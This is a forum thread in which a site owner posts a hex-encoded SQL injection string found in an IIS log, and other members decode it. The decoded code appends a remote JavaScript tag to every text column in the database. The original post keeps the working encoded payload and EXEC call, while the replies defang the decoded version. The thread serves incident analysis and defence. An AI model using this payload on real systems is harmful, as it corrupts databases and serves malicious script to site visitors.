SQL Server Forums
Profile | Register | Active Topics | Members | Search | Forum FAQ
 
Register Now and get your question answered!
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 General SQL Server Forums
 New to SQL Server Programming
 What is this command for ?
 New Topic  Reply to Topic
 Printer Friendly
Author Previous Topic Topic Next Topic  

Vaishu
Posting Yak Master

178 Posts

Posted - 04/24/2008 :  12:08:14  Show Profile  Reply with Quote
Hi I found the below code in the Log of IIS server. Some one run this code from my website. Any one can tell me what does the blow code is upto??


Department=SLA;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

advance thanks

Edited by - Vaishu on 04/24/2008 12:10:01

gongxia649
So Suave

Azores
344 Posts

Posted - 04/24/2008 :  12:16:37  Show Profile  Visit gongxia649's Homepage  Reply with Quote
declare @s nvarchar(4000)
set @s = cast(xxx as nvarchar(400))
exec @s
Go to Top of Page

RyanRandall
Flowing Fount of Yak Knowledge

United Kingdom
1074 Posts

Posted - 04/24/2008 :  12:17:25  Show Profile  Reply with Quote
Nasty.

It looks like it will (try to) add '<script src=htt*p://ww*w.nihaorr1.com/1.js></script>' to the end of every varchar/text column in your database!

Did it work?

Edit: added * and * to prevent the link from working.

Ryan Randall
Solutions are easy. Understanding the problem, now, that's the hard part.

Edited by - RyanRandall on 04/24/2008 12:28:56
Go to Top of Page

RyanRandall
Flowing Fount of Yak Knowledge

United Kingdom
1074 Posts

Posted - 04/24/2008 :  12:20:44  Show Profile  Reply with Quote
This is what the code looks like (I've replaced 'exec' with 'print' so this is safe to run).

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)
BEGIN
    print 'update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=htt*p://ww*w.nihaorr1.com/1.js></script>'''
    FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor


Edit: added * and * to prevent the link from working.

Ryan Randall
Solutions are easy. Understanding the problem, now, that's the hard part.

Edited by - RyanRandall on 04/24/2008 12:29:18
Go to Top of Page

RyanRandall
Flowing Fount of Yak Knowledge

United Kingdom
1074 Posts

Posted - 04/24/2008 :  12:25:09  Show Profile  Reply with Quote
I've just looked, and there's plenty on google about this... http://www.google.com/search?hl=en&q=nihaorr1.com

Ryan Randall
Solutions are easy. Understanding the problem, now, that's the hard part.
Go to Top of Page

madhivanan
Premature Yak Congratulator

India
22755 Posts

Posted - 04/25/2008 :  05:20:20  Show Profile  Send madhivanan a Yahoo! Message  Reply with Quote
quote:
Originally posted by RyanRandall

This is what the code looks like (I've replaced 'exec' with 'print' so this is safe to run).

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)
BEGIN
    print 'update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=htt*p://ww*w.nihaorr1.com/1.js></script>'''
    FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor


Edit: added * and * to prevent the link from working.

Ryan Randall
Solutions are easy. Understanding the problem, now, that's the hard part.


And if it is just for printing purpose then

select 'update ['+a.name+'] set ['+b.name+']' from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)


Madhivanan

Failing to plan is Planning to fail
Go to Top of Page

Vaishu
Posting Yak Master

178 Posts

Posted - 04/25/2008 :  09:43:36  Show Profile  Reply with Quote
Thank you, Thanks a lot for every one to rply. It doesn't update or enter new records to any of our existing tables as far as I know.
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
SQL Server Forums © 2000-2009 SQLTeam Publishing, LLC Go To Top Of Page
This page was generated in 0.16 seconds. Powered By: Snitz Forums 2000